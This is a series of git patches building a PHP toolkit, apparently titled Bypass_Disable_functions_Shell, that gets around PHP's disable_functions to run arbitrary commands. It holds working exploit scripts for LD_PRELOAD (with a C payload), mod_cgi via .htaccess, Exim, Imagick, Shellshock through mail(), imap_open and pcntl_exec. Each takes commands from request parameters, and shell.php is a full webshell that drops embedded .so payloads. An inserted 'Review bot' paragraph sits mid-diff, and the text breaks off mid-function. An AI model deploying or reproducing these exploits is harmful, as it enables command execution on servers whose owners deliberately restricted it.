From 838f2a39a3d8f278c6ba47b4393c96e1be5cfaed Mon Sep 17 00:00:00 2001 From: l3m0n Date: Mon, 16 Jul 2018 19:11:08 +0800 Subject: [PATCH 01/16] update some exp --- exp/LD_PRELOAD/exp.php | 4 ++++ exp/LD_PRELOAD/hack.c | 18 ++++++++++++++ exp/apache_mod_cgi/exp.php | 30 +++++++++++++++++++++++ exp/dl/exp.php | 5 ++++ exp/exim/exp.php | 12 ++++++++++ exp/imagick/exp.php | 49 ++++++++++++++++++++++++++++++++++++++ exp/mail/exp.php | 32 +++++++++++++++++++++++++ exp/pcntl_exec/exp.php | 5 ++++ function_check.php | 34 +++++++++++++------------- 9 files changed, 172 insertions(+), 17 deletions(-) create mode 100644 exp/LD_PRELOAD/exp.php create mode 100644 exp/LD_PRELOAD/hack.c create mode 100644 exp/apache_mod_cgi/exp.php create mode 100644 exp/dl/exp.php create mode 100644 exp/exim/exp.php create mode 100644 exp/imagick/exp.php create mode 100644 exp/mail/exp.php create mode 100644 exp/pcntl_exec/exp.php diff --git a/exp/LD_PRELOAD/exp.php b/exp/LD_PRELOAD/exp.php new file mode 100644 index 0000000..810334f --- /dev/null +++ b/exp/LD_PRELOAD/exp.php @@ -0,0 +1,4 @@ + \ No newline at end of file diff --git a/exp/LD_PRELOAD/hack.c b/exp/LD_PRELOAD/hack.c new file mode 100644 index 0000000..67fc33b --- /dev/null +++ b/exp/LD_PRELOAD/hack.c @@ -0,0 +1,18 @@ +#include +#include +#include + +void payload() { + system("rm /tmp/check.txt"); +} + +int geteuid() { +if (getenv("LD_PRELOAD") == NULL) { return 0; } +unsetenv("LD_PRELOAD"); +payload(); +} + +/* +$ gcc -c -fPIC hack.c -o hack +$ gcc -shared hack -o hack.so + */ \ No newline at end of file diff --git a/exp/apache_mod_cgi/exp.php b/exp/apache_mod_cgi/exp.php new file mode 100644 index 0000000..69fe0bd --- /dev/null +++ b/exp/apache_mod_cgi/exp.php 
@@ -0,0 +1,30 @@ +\n"; +} +if (!isset($_GET['checked'])) { + @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed + header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked +} else { + $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled? + $writable = is_writable('.'); //current dir writable? + $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled? + checkEnabled("Mod-Cgi enabled", $modcgi, "Yes", "No"); + checkEnabled("Is writable", $writable, "Yes", "No"); + checkEnabled("htaccess working", $htaccess, "Yes", "No"); + if (!($modcgi && $writable && $htaccess)) { + echo "Error. All of the above must be true for the script to work!"; //abort if not + } else { + checkEnabled("Backing up .htaccess", copy(".htaccess", ".htaccess.bak"), "Suceeded! Saved in .htaccess.bak", "Failed!"); //make a backup, cause you never know. + checkEnabled("Write .htaccess file", file_put_contents('.htaccess', "Options +ExecCGI\nAddHandler cgi-script .dizzle"), "Succeeded!", "Failed!"); //.dizzle is a nice extension + checkEnabled("Write shell file", file_put_contents('shell.dizzle', $shellfile), "Succeeded!", "Failed!"); //write the file + checkEnabled("Chmod 777", chmod("shell.dizzle", 0777), "Succeeded!", "Failed!"); //rwx + echo "Executing the script now. Check your listener "; //call the script + } +} +?> \ No newline at end of file diff --git a/exp/dl/exp.php b/exp/dl/exp.php new file mode 100644 index 0000000..755eac7 --- /dev/null +++ b/exp/dl/exp.php @@ -0,0 +1,5 @@ +自写插件,自定义函数,调用system函数 +1.txt"); +?> \ No newline at end of file diff --git a/exp/exim/exp.php b/exp/exim/exp.php new file mode 100644 index 0000000..7dc33f0 --- /dev/null +++ b/exp/exim/exp.php 
@@ -0,0 +1,12 @@ +' . $result_file; +file_put_contents($tmp_file, $command); +$payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}/tmp/aaaaaaaaaaa.sh}{ok}{error}}"; +mail("a@localhost", "", "", "", $payload); +echo file_get_contents($result_file); +@unlink($tmp_file); +@unlink($result_file); +?> \ No newline at end of file diff --git a/exp/imagick/exp.php b/exp/imagick/exp.php new file mode 100644 index 0000000..387daca --- /dev/null +++ b/exp/imagick/exp.php @@ -0,0 +1,49 @@ +# Exploit Title: PHP Imagick disable_functions Bypass +# Date: 2016-05-04 +# Exploit Author: RicterZ (ricter@chaitin.com) +# Vendor Homepage: https://pecl.php.net/package/imagick +# Version: Imagick <= 3.3.0 PHP >= 5.4 +# Test on: Ubuntu 12.04 + +# Exploit: + + +# +# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd" +#
+# Disable functions: exec,passthru,shell_exec,system,popen
+# Run command: cat /etc/passwd
+# ====================
+# root:x:0:0:root:/root:/usr/local/bin/fish
+# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+# bin:x:2:2:bin:/bin:/bin/sh
+# sys:x:3:3:sys:/dev:/bin/sh
+# sync:x:4:65534:sync:/bin:/bin/sync
+# games:x:5:60:games:/usr/games:/bin/sh
+# ...
+# 
+echo "Disable functions: " . ini_get("disable_functions") . "\n"; +$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id'; +echo "Run command: $command\n====================\n"; + +$data_file = tempnam('/tmp', 'img'); +$imagick_file = tempnam('/tmp', 'img'); + +$exploit = <<$data_file")' +pop graphic-context +EOF; + +file_put_contents("$imagick_file", $exploit); +$thumb = new Imagick(); +$thumb->readImage("$imagick_file"); +$thumb->writeImage(tempnam('/tmp', 'img')); +$thumb->clear(); +$thumb->destroy(); + +echo file_get_contents($data_file); +?> \ No newline at end of file diff --git a/exp/mail/exp.php b/exp/mail/exp.php new file mode 100644 index 0000000..d114e41 --- /dev/null +++ b/exp/mail/exp.php @@ -0,0 +1,32 @@ +$tmp 2>&1"); + // In Safe Mode, the user may only alter environment variableswhose names + // begin with the prefixes supplied by this directive. + // By default, users will only be able to set environment variablesthat + // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, + // PHP will let the user modify ANY environment variable! + mail("a@127.0.0.1", "", "", "", "-bv"); // -bv so we don't actuallysend any mail + $output = @file_get_contents($tmp); + @unlink($tmp); + if ($output != "") { + return $output; + } else { + return "No output, or not vuln."; + } + +} +echo shellshock($_REQUEST["cmd"]); +?> \ No newline at end of file diff --git a/exp/pcntl_exec/exp.php b/exp/pcntl_exec/exp.php new file mode 100644 index 0000000..49e734e --- /dev/null +++ b/exp/pcntl_exec/exp.php @@ -0,0 +1,5 @@ +#exec.php + +#/tmp/b4dboy.sh +#!/bin/bash +ls -l / \ No newline at end of file diff --git a/function_check.php b/function_check.php index 1c47a21..d9b52d9 100644 --- a/function_check.php +++ b/function_check.php @@ -2,7 +2,7 @@ $def $text
"; - - } - +function msg($text,$type=0){ + + $def="[*]"; + $color="green"; + if($type ==1){ + + $def="[+]" ; + $color="red"; + }else if ($type==-1){ + + $def="[-]"; + } + echo "$def $text
"; + +} + From b87b368d4ff0ba05d3f0a28188cce246292f907c Mon Sep 17 00:00:00 2001 From: l3m0n Date: Mon, 16 Jul 2018 19:14:44 +0800 Subject: [PATCH 02/16] =?UTF-8?q?=E4=BC=98=E5=8C=96=E4=B8=80=E4=BA=9B?= =?UTF-8?q?=E5=86=85=E5=AE=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 71 +++++++++++++++++++++++++++++++++++++++++ bypass.php | 28 +++++++++++++++++ bypass_function.md | 78 ---------------------------------------------- function_check.php | 46 --------------------------- 4 files changed, 99 insertions(+), 124 deletions(-) delete mode 100644 bypass_function.md delete mode 100644 function_check.php diff --git a/README.md b/README.md index 4f8b2a6..2920d5b 100644 --- a/README.md +++ b/README.md 
@@ -1,2 +1,73 @@
 # Bypass_Disable_functions_Shell
 一个各种方式突破Disable_functions达到命令执行的shell
+
+### 功能
+##### 利用环境变量LD_PRELOAD来绕过
+
+http://drops.wooyun.org/tips/16054
+
+##### ImageMagick绕过
+
+http://drops.wooyun.org/papers/15589
+
+https://www.exploit-db.com/exploits/39766/
+
+##### imagecreatefromgd2
+
+https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074
+
+##### test
+
+https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078
+
+##### PHP OPcache
+
+http://www.myhack58.com/Article/html/3/62/2016/74160.htm
+
+http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/
+
+##### mail函数
+
+https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html
+
+https://www.exploit-db.com/exploits/35146/
+
+##### 利用pcntl_exec突破
+
+http://www.cnseay.com/2632/comment-page-1/
+
+```
+#exec.php
+
+#/tmp/b4dboy.sh
+#!/bin/bash
+ls -l /
+```
+
+##### 破壳bash漏洞
+
+##### dl
+
+https://www.exploit-db.com/docs/38104.pdf
+
+##### PHP 5.x - COM functions safe_mode and disable_function bypass
+
+https://www.exploit-db.com/exploits/4553/
+
+https://www.exploit-db.com/exploits/4517/
+
+##### win_shell_execute
+
+https://www.exploit-db.com/exploits/4218/
+
+##### Bypass PHP system functions disabled via mod_cgi
+
+http://0cx.cc/bypass_disabled_via_mod_cgi.jspx
+
+##### mail的exim扩展bypass
+http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html
+
+### 防御
+dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail
+
+
diff --git a/bypass.php b/bypass.php
index 36e2a40..7989d7b 100644
--- a/bypass.php
+++ b/bypass.php
@@ -2,6 +2,34 @@ //from silic-webshell //usage: http://lemon.love:8081/bypass.php?cmd=ipconfig +msg("php enable_functions enumeration script"); +$func_arr=array('dl','exec','system','passthru','popen','proc_open','pcntl_exec','shell_exec','mail','symlink','putenv') +$dis_func_arr = explode(",",get_cfg_var("disable_functions")); + +if($dis_func_arr[0]){ + foreach ($func_arr as $func) { + if(!in_array($func,$dis_func_arr)){ + msg("Function: $func enable",1); + } + } +}else{ + msg("disable_functions none !!!",1); +} +function msg($text,$type=0){ + + $def="[*]"; + $color="green"; + if($type ==1){ + + $def="[+]" ; + $color="red"; + }else if ($type==-1){ + + $def="[-]"; + } + echo "$def $text
"; +} + function Exec_Run($cmd) { $res = ''; if (function_exists('exec')) { diff --git a/bypass_function.md b/bypass_function.md deleted file mode 100644 index e1d674c..0000000 --- a/bypass_function.md +++ /dev/null @@ -1,78 +0,0 @@ - - -### 功能 -##### 利用环境变量LD_PRELOAD来绕过 - -http://drops.wooyun.org/tips/16054 - -##### ImageMagick绕过 - -http://drops.wooyun.org/papers/15589 - -https://www.exploit-db.com/exploits/39766/ - -##### imagecreatefromgd2 - -https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074 - -##### test - -https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078 - -##### PHP OPcache - -http://www.myhack58.com/Article/html/3/62/2016/74160.htm - -http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ - -##### mail函数 - -https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html - -https://www.exploit-db.com/exploits/35146/ - -##### 利用pcntl_exec突破 - -http://www.cnseay.com/2632/comment-page-1/ - -``` -#exec.php - -#/tmp/b4dboy.sh -#!/bin/bash -ls -l / -``` - -##### 破壳bash漏洞 - -##### dl - -https://www.exploit-db.com/docs/38104.pdf - -##### PHP 5.x - COM functions safe_mode and disable_function bypass - -https://www.exploit-db.com/exploits/4553/ - -https://www.exploit-db.com/exploits/4517/ - -##### win_shell_execute - -https://www.exploit-db.com/exploits/4218/ - -##### Bypass PHP system functions disabled via mod_cgi - -http://0cx.cc/bypass_disabled_via_mod_cgi.jspx - -##### mail的exim扩展bypass -http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html - -### 防御 -dl -exec -system -passthru -popen -proc_open -pcntl_exec -shell_exec -mail diff --git a/function_check.php b/function_check.php deleted file mode 100644 index d9b52d9..0000000 --- a/function_check.php +++ /dev/null 
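Review bot: `$dis_func_arr = explode(",",get_cfg_var("disable_functions"));` keeps any whitespace that follows a comma, so a php.ini value written as `exec, system` yields the entry `" system"` and the loose `in_array($func,$dis_func_arr)` test below then reports `system` as enabled although it is disabled. Trim the entries and compare strictly: `$dis_func_arr = array_map('trim', explode(",", get_cfg_var("disable_functions")));` and `if(!in_array($func, $dis_func_arr, true)){`. `get_cfg_var` is also documented to return only what php.ini sets, not a value applied from the web-server configuration, so `ini_get('disable_functions')` is the more reliable source for this check. The reformatted copy of this block in the later imap_open patch repeats the same parsing unchanged, and `Exec_Run` at the bottom of the hunk continues past it.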
@@ -1,46 +0,0 @@ - - $func enable",1); - - } - } - - - }else{ - - msg("disable_functions none !!!",1); - - } - -function msg($text,$type=0){ - - $def="[*]"; - $color="green"; - if($type ==1){ - - $def="[+]" ; - $color="red"; - }else if ($type==-1){ - - $def="[-]"; - } - echo "$def $text
"; - -} - - - - - -?> \ No newline at end of file From d3421c2099ec777237f19f5b639e04c53851e5e0 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Mon, 16 Jul 2018 19:15:57 +0800 Subject: [PATCH 03/16] now --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2920d5b..24fe6cd 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,9 @@ # Bypass_Disable_functions_Shell 一个各种方式突破Disable_functions达到命令执行的shell +### 防御 +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail + ### 功能 ##### 利用环境变量LD_PRELOAD来绕过 @@ -67,7 +70,5 @@ http://0cx.cc/bypass_disabled_via_mod_cgi.jspx ##### mail的exim扩展bypass http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html -### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail From 727cbeb8b1ab8aa90e74f5f9bfe8988955996da7 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Mon, 10 Sep 2018 13:34:23 +0800 Subject: [PATCH 04/16] Update bypass.php fix some bug --- bypass.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/bypass.php b/bypass.php index 7989d7b..662cd76 100644 --- a/bypass.php +++ b/bypass.php @@ -3,7 +3,7 @@ //usage: http://lemon.love:8081/bypass.php?cmd=ipconfig msg("php enable_functions enumeration script"); -$func_arr=array('dl','exec','system','passthru','popen','proc_open','pcntl_exec','shell_exec','mail','symlink','putenv') +$func_arr=array('dl','exec','system','passthru','popen','proc_open','pcntl_exec','shell_exec','mail','symlink','putenv'); $dis_func_arr = explode(",",get_cfg_var("disable_functions")); if($dis_func_arr[0]){ From 7228c8ace18794b7daf6c79c564e7027b466a3de Mon Sep 17 00:00:00 2001 From: l3m0n Date: Thu, 15 Nov 2018 10:25:08 +0800 Subject: [PATCH 05/16] add imap_open bypass --- README.md | 2 +- bypass.php | 42 +++++++++++++++++++++--------------------- exp/imap_open/exp.php | 11 +++++++++++ 3 files changed, 33 insertions(+), 22 deletions(-) create mode 100644 exp/imap_open/exp.php 
diff --git a/README.md b/README.md index 24fe6cd..18bba34 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ 一个各种方式突破Disable_functions达到命令执行的shell ### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open ### 功能 ##### 利用环境变量LD_PRELOAD来绕过 diff --git a/bypass.php b/bypass.php index 7989d7b..4ccd481 100644 --- a/bypass.php +++ b/bypass.php @@ -3,29 +3,29 @@ //usage: http://lemon.love:8081/bypass.php?cmd=ipconfig msg("php enable_functions enumeration script"); -$func_arr=array('dl','exec','system','passthru','popen','proc_open','pcntl_exec','shell_exec','mail','symlink','putenv') -$dis_func_arr = explode(",",get_cfg_var("disable_functions")); +$func_arr = array('imap_open', 'dl', 'exec', 'system', 'passthru', 'popen', 'proc_open', 'pcntl_exec', 'shell_exec', 'mail', 'symlink', 'putenv'); +$dis_func_arr = explode(",", get_cfg_var("disable_functions")); -if($dis_func_arr[0]){ - foreach ($func_arr as $func) { - if(!in_array($func,$dis_func_arr)){ - msg("Function: $func enable",1); - } - } -}else{ - msg("disable_functions none !!!",1); +if ($dis_func_arr[0]) { + foreach ($func_arr as $func) { + if (!in_array($func, $dis_func_arr)) { + msg("Function: $func enable", 1); + } + } +} else { + msg("disable_functions none !!!", 1); } -function msg($text,$type=0){ - - $def="[*]"; - $color="green"; - if($type ==1){ - - $def="[+]" ; - $color="red"; - }else if ($type==-1){ - - $def="[-]"; +function msg($text, $type = 0) { + + $def = "[*]"; + $color = "green"; + if ($type == 1) { + + $def = "[+]"; + $color = "red"; + } else if ($type == -1) { + + $def = "[-]"; } echo "$def $text
"; } diff --git a/exp/imap_open/exp.php b/exp/imap_open/exp.php new file mode 100644 index 0000000..77f3994 --- /dev/null +++ b/exp/imap_open/exp.php @@ -0,0 +1,11 @@ +/tmp/test0001 + +error_reporting(0); +if (!function_exists('imap_open')) { + die("no imap_open function!"); +} +$server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}"; +imap_open('{' . $server . ':143/imap}INBOX', '', ''); // or var_dump("\n\nError: ".imap_last_error()); +echo file_get_contents("/tmp/cmd_result"); \ No newline at end of file From 0c70407570a0df6e846bb069b310418eb91c7c0c Mon Sep 17 00:00:00 2001 From: l3m0n Date: Thu, 15 Nov 2018 10:43:24 +0800 Subject: [PATCH 06/16] update readme.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 18bba34..dc99985 100644 --- a/README.md +++ b/README.md @@ -5,6 +5,9 @@ dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open ### 功能 +##### imap_open bypass +https://antichat.com/threads/463395/#post-4254681 + ##### 利用环境变量LD_PRELOAD来绕过 http://drops.wooyun.org/tips/16054 From 805a7b2a6bb31a79e8e430baf59a61dcdb458a7e Mon Sep 17 00:00:00 2001 From: l3m0n Date: Sat, 22 Dec 2018 13:24:47 +0800 Subject: [PATCH 07/16] update imap_mail function, somelike mail function --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index dc99985..0ed333a 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ 一个各种方式突破Disable_functions达到命令执行的shell ### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv ### 功能 ##### imap_open bypass From cbed5d9c4dfc3c578456ac0f2936962bf34a7758 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Sat, 22 Dec 2018 13:34:28 +0800 Subject: [PATCH 08/16] update --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/README.md b/README.md index 0ed333a..e726838 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ 一个各种方式突破Disable_functions达到命令执行的shell ### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link ### 功能 ##### imap_open bypass From 06ad421c4d063a58dbd1309b193565cf34b5317b Mon Sep 17 00:00:00 2001 From: l3m0n Date: Thu, 2 May 2019 22:55:49 +0800 Subject: [PATCH 09/16] update readme.md --- README.md | 73 ++++++------------------------------------------------- 1 file changed, 7 insertions(+), 66 deletions(-) diff --git a/README.md b/README.md index e726838..a312b07 100644 --- a/README.md +++ b/README.md 
@@ -1,77 +1,18 @@ -# Bypass_Disable_functions_Shell -一个各种方式突破Disable_functions达到命令执行的shell +# Bypass Disable Functions Shell -### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link - -### 功能 -##### imap_open bypass -https://antichat.com/threads/463395/#post-4254681 - -##### 利用环境变量LD_PRELOAD来绕过 - -http://drops.wooyun.org/tips/16054 - -##### ImageMagick绕过 - -http://drops.wooyun.org/papers/15589 - -https://www.exploit-db.com/exploits/39766/ - -##### imagecreatefromgd2 - -https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074 - -##### test - -https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078 - -##### PHP OPcache - -http://www.myhack58.com/Article/html/3/62/2016/74160.htm - -http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ - -##### mail函数 - -https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html - -https://www.exploit-db.com/exploits/35146/ - -##### 利用pcntl_exec突破 - -http://www.cnseay.com/2632/comment-page-1/ +禁用函数列表(希望能做最全的禁用列表,也可以用此做对比进行绕过): ``` -#exec.php - -#/tmp/b4dboy.sh -#!/bin/bash -ls -l / +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link ``` -##### 破壳bash漏洞 - -##### dl - -https://www.exploit-db.com/docs/38104.pdf - -##### PHP 5.x - COM functions safe_mode and disable_function bypass - -https://www.exploit-db.com/exploits/4553/ - -https://www.exploit-db.com/exploits/4517/ - -##### win_shell_execute - -https://www.exploit-db.com/exploits/4218/ -##### Bypass PHP system functions disabled via mod_cgi +目录结构: +- env - docker环境, 用于测试各类绕过exp +- papar - bypass原理 +- exp - bypass脚本 -http://0cx.cc/bypass_disabled_via_mod_cgi.jspx -##### mail的exim扩展bypass -http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html From 77db29e0c156f859f263e91167c74ebd0a08a411 Mon Sep 17 00:00:00 2001 
From: l3m0n Date: Tue, 18 Jun 2019 11:14:00 +0800 Subject: [PATCH 10/16] new shell init --- .idea/dictionaries/l3m0n.xml | 3 + .idea/vcs.xml | 6 + ant.php | 7 + exp/so/php_so.c | 0 exp/so/system_so.c | 0 shell.php | 528 +++++++++++++++++++++++++++++++++++ test.php | 7 + 7 files changed, 551 insertions(+) create mode 100644 .idea/dictionaries/l3m0n.xml create mode 100644 .idea/vcs.xml create mode 100644 ant.php create mode 100644 exp/so/php_so.c create mode 100644 exp/so/system_so.c create mode 100644 shell.php create mode 100644 test.php diff --git a/.idea/dictionaries/l3m0n.xml b/.idea/dictionaries/l3m0n.xml new file mode 100644 index 0000000..d245da0 --- /dev/null +++ b/.idea/dictionaries/l3m0n.xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/.idea/vcs.xml b/.idea/vcs.xml new file mode 100644 index 0000000..94a25f7 --- /dev/null +++ b/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/ant.php b/ant.php new file mode 100644 index 0000000..c7fe53f --- /dev/null +++ b/ant.php @@ -0,0 +1,7 @@ + array("exec", "shell_exec", "system", "passthru", "popen", "proc_open"), +// "load_so" => array("dl"), +// "ld_preload_so" => array("mail", "error_log", "imap_mail", "mb_send_mail"), +// "shellshock" => array("mail"), +// "apache_mod_cgi" => array(), +// "imagick" => array(), +// "pwn" => array(), +//); + +echo "Temp Dir:" . WRITE_DIR . "
"; +echo "Arch: " . ARCH . "; OS: " . OS . "

"; + +foreach ($vul_function_arr as $func) { + if (function_exists($func)){ + echo "Exist: ".$func."
"; + } else { + echo "no exist: ".$func."
"; + } +} + +function read_file($filename){ + if(function_exists('file_get_contents')){ + return file_get_contents($filename); + } elseif (function_exists('fopen') && function_exists('fread')){ + $handle = fopen($filename, 'r'); + $content = ''; + while(!feof($handle)){ + $content .= fread($handle, 1000); + } + fclose($handle); + return $content; + } else { + echo "no read function"; + return; + } +} + +function write_file($filename, $content, $model="w"){ + if (function_exists('file_put_contents')) { + file_put_contents($filename, $content); + } else { + echo "no write function"; + return; + } +} + +function random_str($len = 8) { + $s = ''; + for ($i = 0; $i < $len; $i++) { + $s .= chr(mt_rand(33, 126)); + } + return $s; +} + +function is_x64() { + $int = "9223372036854775807"; + $int = intval($int); + if ($int == 9223372036854775807) { + return true; + } + elseif ($int == 2147483647) { + return false; + } + else { + return "error"; + } +} + +function trans_cmd($cmd, $outfile){ + if (OS == 'Windows'){ + $cmd = $cmd . " > " . $outfile; + }else{ + $cmd = $cmd . " > " . $outfile . " 2>&1"; + } + return $cmd; +} + +function send_cmd_to_file($cmd, $file = 'cmd', $result = 'result') { + $outfile = WRITE_DIR . $result; + $cmdfile = WRITE_DIR . $file; + + $cmd = trans_cmd($cmd, $outfile); + + write_file($cmdfile, $cmd); + return array( + $cmdfile, + $outfile + ); +} + +function send_cmd($cmd, $result = 'result') { + $outfile = WRITE_DIR . $result; + + $cmd = trans_cmd($cmd, $outfile); + + return array( + $cmd, + $outfile + ); +} + +function recv_result($result = 'result') { + $ret = read_file($result); + @unlink($result); + return $ret; +} + +function send_socket($data, $host, $port=9000) { + if ( function_exists('stream_socket_client') ) { + if (strpos($host,'unix://') !== false) { + $client = $host; + } else { + $client = 'tcp://' . $host . ':' . 
$port; + } + + $fp = stream_socket_client($client); + } elseif (function_exists('fsockopen')) { + $fp = fsockopen($host, $port, $errno, $errstr, 30); + } else { + return FAILURE; + } + + if ($fp) { + $content = ""; + fwrite($fp, $data); + while (!feof($fp)) { + $content .= fgets($fp, 4096); + } + fclose($fp); + return $content; + } else { + return FAILURE; + } +} + +/* + * 第一种: 常规绕过, 寻找漏掉的命令执行函数, 适用于winodws + linux + * exec、shell_exec、system、passthru、popen、proc_open + */ + +function common_exec_cmd($cmd) { + $res = ''; + if (function_exists('exec')) { + @exec($cmd, $res); + $res = join("\n", $res); + } elseif (function_exists('shell_exec')) { + $res = @shell_exec($cmd); + } elseif (function_exists('system')) { + @ob_start(); + @system($cmd); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif (function_exists('passthru')) { + @ob_start(); + @passthru($cmd); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif (@is_resource($f = @popen($cmd, "r"))) { + $res = ''; + while (!@feof($f)) {$res .= @fread($f, 1024);} + @pclose($f); + } elseif (function_exists('proc_open')) { + $descriptorspec = array( + 0 => array("pipe", "r"), + 1 => array("pipe", "w"), + 2 => array("pipe", "w") + ); + $process = proc_open($cmd, $descriptorspec, $pipes, null, null); + if (is_resource($process)) { + fwrite($pipes[0], '$stdin'); + fclose($pipes[0]); + $res = stream_get_contents($pipes[1]); + }else{ + return FAILURE; + } + } else { + return FAILURE; + } + return $res; +} + +/* + * 第二种: pcntl_exec绕过 + */ + +function pcntl_exec_cmd($cmd) { + if (function_exists('pcntl_exec')) { + $cmd_arr = send_cmd_to_file($cmd, 'cmd.sh'); + pcntl_exec("/bin/bash", array($cmd_arr[0])); + return recv_result($cmd_arr[1]); + } else { + return FAILURE; + } +} + +//echo pcntl_exec_cmd("id"); + +/* + * 第三种: ld_preload绕过: 仅限Linux + * mail、imap_mail、error_log、mb_send_mail + * From: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD/ + */ + +function ld_preload_exec_cmd($cmd) { + 
$so_file = WRITE_DIR . 'system.so'; + + if (ARCH === 64) { + write_file($so_file, hex2bin($GLOBALS['system_so_x64'])); + } else { + write_file($so_file, hex2bin($GLOBALS['system_so_x32'])); + } + + $cmd_arr = send_cmd($cmd, 'result'); + putenv("EVIL_CMDLINE=" . $cmd_arr[0]); + putenv("LD_PRELOAD=" . $so_file); + + if (function_exists('error_log')){ + error_log("", 1, "example@example.com"); + } elseif (function_exists('mail')){ + mail("", "", "", ""); + } elseif (function_exists('mb_send_mail')){ + mb_send_mail("","",""); + } elseif ((function_exists('imap_mail'))){ + imap_mail("","",""); + } else { + @unlink($so_file); + return FAILURE; + } + + // del so file + @unlink($so_file); + return recv_result($cmd_arr[1]); +} + +//echo ld_preload_exec_cmd($_GET['cmd']); + +//$so_file = WRITE_DIR . 'system_x32.so'; +//var_dump(bin2hex(read_file($so_file))); + +/* + * 第四种: ld加载php扩展: + * ld + * https://github.com/Medicean/as_bypass_php_disable_functions + * https://github.com/AntSwordProject/ant_php_extension + */ + +function dl_exec($cmd){ + if(function_exists('dl')){ + $so_file = WRITE_DIR . 'php.so'; + + if (ARCH === 64) { + write_file($so_file, hex2bin($GLOBALS['php_so_x64'])); + } else { + write_file($so_file, hex2bin($GLOBALS['php_so_x32'])); + } + + $so_file = "ant_x64.so"; + dl($so_file); + $result = antsystem($cmd); + + // del so file + @unlink($so_file); + return $result; + }else{ + return FAILURE; + } +} + +//echo dl_exec("id"); + +/* + * 第五种: imap_open: 仅限Linux + */ + +function imap_open_exec($cmd){ + if (function_exists('imap_open')) { + $cmd_arr = send_cmd($cmd); + $server = "x -oProxyCommand=echo\t" . base64_encode($cmd_arr[0]) . "|base64\t-d|sh}"; + imap_open('{' . $server . 
